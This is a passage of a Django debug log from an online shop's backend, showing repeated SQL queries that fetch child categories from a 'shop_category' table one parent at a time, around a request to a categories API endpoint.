"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:48:14,198 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:48:14,204 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:48:14,208 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:48:14,214 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:48:14,218 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:48:14,222 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:48:14,226 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:48:14,231 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:48:14,236 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:48:14,240 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:48:14,244 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:48:14,248 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:48:14,252 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:48:14,258 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:48:14,262 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:48:14,266 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:48:14,269 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:48:14,275 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:48:14,282 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:48:14,289 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:48:14,293 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:48:14,298 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:48:14,302 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:48:14,306 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:48:14,313 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:48:14,317 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:48:14,322 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:48:14,326 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:48:14,331 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:48:14,337 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:48:14,342 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:48:14,346 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:48:14,350 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:48:14,354 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:48:14,362 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:48:14,368 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:48:14,372 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:48:14,376 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:48:14,380 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:48:14,385 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:48:14,390 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:48:14,394 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:48:14,398 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:48:14,404 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:48:14,408 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:48:14] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:48:18,768 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:48:18,778 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:48:18,782 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:48:18,785 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:48:18,788 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:48:18,790 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:48:18,793 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:48:18,795 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:48:18,797 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:48:18,801 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:48:18,803 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:48:18,805 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:48:18,808 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:48:18,810 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:48:18,813 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:48:18,815 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:48:18,817 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:48:18,820 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:48:18,822 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:48:18,825 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:48:18,828 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:48:18,830 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:48:18,832 utils 4252 140031721535232 